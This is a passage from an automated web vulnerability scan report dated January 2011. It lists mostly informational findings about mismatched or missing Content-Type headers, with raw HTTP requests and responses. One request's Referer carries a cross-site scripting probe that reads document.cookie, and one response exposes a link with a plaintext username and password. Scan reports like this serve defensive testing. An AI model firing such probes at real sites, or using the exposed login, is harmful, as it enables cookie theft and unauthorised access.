GIF87a..x.............(((...UUU...... iii........u.K....*.,......x......I..8....`8..h.h..[0.p,.tm.,QL.....N0@....Q. ../.tzR ..@.....W...P...q P@.....S.....``..~. ;..eB.ps...^..=`kbJ%Zz......q..>..D
...[SNIP]...

32.96. https://www.mytraderonline.com/css/promoCSS.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.mytraderonline.com
Path:	/css/promoCSS.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

32.97. https://www.mytraderonline.com/css/tolhomecss.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.mytraderonline.com
Path:	/css/tolhomecss.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

32.98. https://www.mytraderonline.com/javascript/master_s_code.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.mytraderonline.com
Path:	/javascript/master_s_code.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

32.99. https://www.mytraderonline.com/javascript/realmedia.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.mytraderonline.com
Path:	/javascript/realmedia.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

32.100. http://www.netlingo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.netlingo.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:01:56 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 17 Mar 2009 15:51:51 GMT
ETag: "3684ad-4486-8b9eb3c0"
Accept-Ranges: bytes
Content-Length: 17542
Connection: close
Content-Type: text/plain

......00.... ..%..F... .... ......%........ .. ...6........ .h....@..(...0...`..... ......%............................................................................................................
...[SNIP]...

32.101. http://www.newsreaders.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.newsreaders.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /favicon.ico HTTP/1.1
Host: www.newsreaders.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:39 GMT
Server: Apache
Last-Modified: Fri, 15 Oct 1999 15:26:33 GMT
ETag: "94c16c-210-15327c40"
Accept-Ranges: bytes
Content-Length: 528
Connection: close
Content-Type: text/plain

GIF89a&.&...............................ssscc.BBB1..1.c1cc11c!!!.............................................,....&.&.....0.di.h*.l..p..c..x...N...`H,.......@...tJ}
..fu..^....2&...q.\.2.k.Yn...e;..u.
...[SNIP]...

32.102. http://www.paperg.com/jsfb/embed.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.paperg.com
Path:	/jsfb/embed.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

32.103. http://www.parenthood.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.parenthood.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.parenthood.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=kjts65sdrlujvu865hot7asmh3; BIGipServerwww_parenthood.com_http_pool=440556810.20480.0000; __utmz=199637295.1295922194.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/57; __utma=199637295.1708456418.1295922194.1295922194.1295922194.1; __utmc=199637295; __utmb=199637295.1.10.1295922194; s_cc=true; s_evar1=Data%20Not%20Available; s_evar2=Data%20Not%20Available; s_evar3=Data%20Not%20Available; s_lastvisit=1295922193827; s_sq=%5B%5BB%5D%5D; AxData=; Axxd=1; __qca=P0-1852484828-1295922223335

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:17:54 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 05 Feb 2003 15:05:58 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: public
Expires: Thu, 15 May 2010 20:00:00 GMT
Content-Type: text/plain; charset=ISO-8859-1
Content-Length: 1466

......................(.......&................................F.......\.......a...R...............e.......5.......................f...|...|...t...G...g...2...........K...............8...............e
...[SNIP]...

32.104. http://www.soundingsonline.com/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.soundingsonline.com
Path:	/

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

32.105. http://www.traderonline.com/css/promoCSS.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.traderonline.com
Path:	/css/promoCSS.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

32.106. http://www.traderonline.com/css/tolhomecss.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.traderonline.com
Path:	/css/tolhomecss.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

32.107. http://www.traderonline.com/javascript/master_s_code.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.traderonline.com
Path:	/javascript/master_s_code.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

32.108. http://www.traderonline.com/javascript/realmedia.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.traderonline.com
Path:	/javascript/realmedia.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

32.109. http://www.vox.com/.shared/css/base.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.vox.com
Path:	/.shared/css/base.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /.shared/css/base.css HTTP/1.1
Host: www.vox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

32.110. http://www.w3.org/1999/02/22-rdf-syntax-ns previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.w3.org
Path:	/1999/02/22-rdf-syntax-ns

Issue detail

The response contains the following Content-type statement:

Content-Type: application/rdf+xml

The response states that it contains XML. However, it actually appears to contain plain text.

Request

GET /1999/02/22-rdf-syntax-ns HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:40:05 GMT
Server: Apache/2
Last-Modified: Thu, 30 Dec 2010 06:21:52 GMT
ETag: "1b92-4989ab3934000"
Accept-Ranges: bytes
Content-Length: 7058
Cache-Control: max-age=21600
Expires: Tue, 25 Jan 2011 10:40:05 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: application/rdf+xml

<rdf:RDF
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:rdfs="http://www.w3.org/2000/01/rdf-schema#"
xmlns:owl="http://www.w3.org/2002/07/owl#"
xmlns:dc="http://purl.org/dc
...[SNIP]...

32.111. http://www.w3.org/TR/html4/strict.dtd previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.w3.org
Path:	/TR/html4/strict.dtd

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /TR/html4/strict.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

32.112. http://www1.whdh.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www1.whdh.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; __utmc=208585492; __utmb=208585492.1.10.1295906131; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; ACC1TAB=1

Response

HTTP/1.1 200 OK
Date: Sun, 23 Jan 2011 02:59:18 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Type: text/plain; charset=ISO-8859-1
Last-Modified: Fri, 04 Apr 2008 13:53:10 GMT
ETag: "224114-9be-703dbd80"
Accept-Ranges: bytes
Age: 154549
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Sun, 30 Jan 2011 02:59:18 GMT
Cache-Control: max-age=604800
Via: 1.1 dfw107010 (MII-APC/1.6)
Content-Length: 2494

...... ..............(... ...@.................................s...{...........................s...{.................!!..!!..))..))..))..))..11..11..11..99..99..BB..BB..BB..JJ..JJ..JJ..RR..RR..ZZ..c.
...[SNIP]...

32.113. http://www1.whdh.com/includes/elements/accordion_whdh-links previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/includes/elements/accordion_whdh-links

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /includes/elements/accordion_whdh-links HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:27 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: accordion_whdh-links.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:58:16 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close
Content-Length: 1489

<ul class='list' style="margin:10px;"><li><a href="http://12.27.100.145/cgi-bin/Xebra?logon&userid=autism&password=speaks">Autism Speaks New England Chapter </a></li>
<li><a href="http://www1.whdh.co
...[SNIP]...

32.114. http://www1.whdh.com/js/sunbeam09.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/js/sunbeam09.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/sunbeam09.js?20100903 HTTP/1.1
Host: www1.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:53:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: sunbeam09.js.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=2592000
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Wed, 23 Feb 2011 21:53:01 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107010 (MII-APC/1.6)
Content-Length: 12633

function EmailNewsteam(anId)
{
var url = "/newsteam/email_newsteam.php?id="+anId;
var popupWin = window.open(url, "emailnewsteam", "status,width=420,height=560,screenx=5,screeny=5,left=5,top
...[SNIP]...

32.115. http://www3.whdh.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www3.whdh.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www3.whdh.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHDHSTR=c8e7165f6bccdedcb43d58e60027d58c; PHPSESSID=3198023387448ce0f3267c57086618b1; __utmz=208053012.1295920517.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/48; __utma=208053012.1206922820.1295920517.1295920517.1295920517.1; __utmc=208053012; __utmb=208053012.1.10.1295920517

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:54:27 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Fri, 04 Apr 2008 13:53:10 GMT
ETag: "224114-9be-703dbd80"
Accept-Ranges: bytes
Content-Length: 2494
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

...... ..............(... ...@.................................s...{...........................s...{.................!!..!!..))..))..))..))..11..11..11..99..99..BB..BB..BB..JJ..JJ..JJ..RR..RR..ZZ..c.
...[SNIP]...

33. Content type is not specified previous
There are 3 instances of this issue:

http://click.linksynergy.com/fs-bin/click
http://www.assoc-amazon.com/s/ads-common.js
http://www.aucegypt.edu/x22

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

33.1. http://click.linksynergy.com/fs-bin/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/click

Request

GET /fs-bin/click HTTP/1.1
Host: click.linksynergy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Length: 190
Date: Mon, 24 Jan 2011 15:01:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Error</title></head><body>
Missing offer id cookie
</body></html>

33.2. http://www.assoc-amazon.com/s/ads-common.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.assoc-amazon.com
Path:	/s/ads-common.js

Request

GET /s/ads-common.js HTTP/1.1
Host: www.assoc-amazon.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

// Color library

// RGB object
function AmazonRGB(red, green, blue)
{
// These are integers between 0 and 255 inclusive.
this.r = red;
this.g = green;
this.b = blue;
}

// Accessor methods for the RGB
...[SNIP]...

33.3. http://www.aucegypt.edu/x22 previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aucegypt.edu
Path:	/x22

Request

GET /x22 HTTP/1.1
Host: www.aucegypt.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NOT FOUND
Cache-Control: private,max-age=0
Content-Length: 13
Server: Microsoft-IIS/7.5
Exires: Sun, 09 Jan 2011 16:02:19 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 16:02:18 GMT
Connection: close

404 NOT FOUND

Report generated by CloudScan Vulnerability Crawler at Tue Jan 25 10:42:47 CST 2011.